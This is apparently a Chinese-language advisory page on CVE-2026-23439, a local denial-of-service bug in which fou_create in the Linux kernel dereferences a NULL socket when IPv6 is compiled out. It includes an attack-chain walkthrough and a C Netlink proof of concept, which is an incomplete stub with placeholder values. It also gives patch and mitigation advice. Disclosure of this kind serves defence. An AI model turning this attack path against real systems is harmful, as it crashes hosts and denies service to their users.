CVE-2026-23439 CVSS 5.5 中危

CVE-2026-23439: Linux内核udp_tunnel空指针解引用漏洞

披露日期: 2026-04-03

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23439

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

CVE-2026-23439 是 Linux 内核网络子系统中发现的一个本地拒绝服务漏洞。该漏洞源于 udp_tunnel 模块中的 udp_sock_create6 函数在处理 IPv6 socket 创建请求时的逻辑错误。具体而言，当内核编译时禁用了 IPv6 协议栈（CONFIG_IPV6=n），该函数仍返回成功状态码（0）而不实际创建 socket 对象。随后，调用该函数的 fou_create 函数会错误地认为 socket 已创建，并尝试解引用该空指针，导致内核崩溃。此漏洞允许本地低权限用户通过发送特制的 Netlink 消息触发，从而破坏系统可用性。

技术细节

漏洞触发点位于 net/ipv4/fou_core.c 的 fou_create 函数，该函数被 Netlink 回调 fou_nl_add_doit 调用。在处理 Foo over UDP (FOU) 封装配置时，如果用户请求 IPv6 封装，代码会调用 udp_sock_create6。然而，在 CONFIG_IPV6=n 的配置下，udp_sock_create6 仅返回 0 而未初始化 socket 结构体指针。fou_create 未对返回的指针进行 NULL 检查，直接将其传递给后续函数进行解引用。攻击者利用本地低权限账户，通过 sendto 系统调用向 Netlink 套接字发送恶意的 FOU 配置消息，即可触发 BUG: kernel NULL pointer dereference。崩溃日志显示 RIP 寄存器指向 fou_nl_add_doit 内的偏移量，证实了空指针访问发生在处理逻辑中。由于涉及内核态内存访问，这会导致系统立即 Panic 或重启，造成拒绝服务。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者需要在目标系统上拥有本地低权限用户账户。

STEP 2

步骤2：构造恶意消息

攻击者编写程序，通过 Netlink 接口构造一个针对 FOU (Foo over UDP) 子系统的配置请求，要求创建一个 IPv6 类型的 UDP 封装 socket。

STEP 3

步骤3：触发漏洞函数

内核接收 Netlink 消息并调用 fou_nl_add_doit，进而调用 fou_create。fou_create 尝试通过 udp_sock_create6 创建 socket。

STEP 4

步骤4：空指针解引用

由于内核未开启 IPv6 支持，udp_sock_create6 返回成功但未创建 socket。fou_create 在未检查的情况下解引用该空指针。

STEP 5

步骤5：系统崩溃

内核触发 NULL pointer dereference 异常，导致系统 Panic 或重启，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

// Proof of Concept for CVE-2026-23439
// Triggers NULL pointer deref in fou_create via Netlink
int main() {
    int fd;
    struct sockaddr_nl sa;
    char buf[1024];
    struct nlmsghdr *nh;

    // Create Netlink socket
    fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
    if (fd < 0) {
        perror("socket");
        return 1;
    }

    memset(&sa, 0, sizeof(sa));
    sa.nl_family = AF_NETLINK;
    bind(fd, (struct sockaddr *)&sa, sizeof(sa));

    memset(buf, 0, sizeof(buf));
    nh = (struct nlmsghdr *)buf;

    // Construct Netlink message targeting FOU (Foo over UDP)
    // Note: Actual family ID resolution is omitted for brevity
    nh->nlmsg_type = 0; // Replace with actual FOU family ID
    nh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    nh->nlmsg_len = NLMSG_LENGTH(0); // Payload would contain IPv6 config

    // Send malicious request to trigger udp_sock_create6 with CONFIG_IPV6=n
    sendto(fd, buf, nh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa));

    close(fd);
    return 0;
}

影响范围

Linux Kernel (Mainline)

Linux Kernel (Stable branches before patch 003343985f26...)

防御指南

临时缓解措施

建议立即应用官方提供的内核补丁，该补丁修改了 udp_sock_create6 的返回值逻辑，使其在 IPv6 未启用时返回 -EPFNOSUPPORT 错误码，从而阻止调用者继续执行。在无法立即重启更新内核的情况下，可通过禁用 FOU 模块或限制用户权限来降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表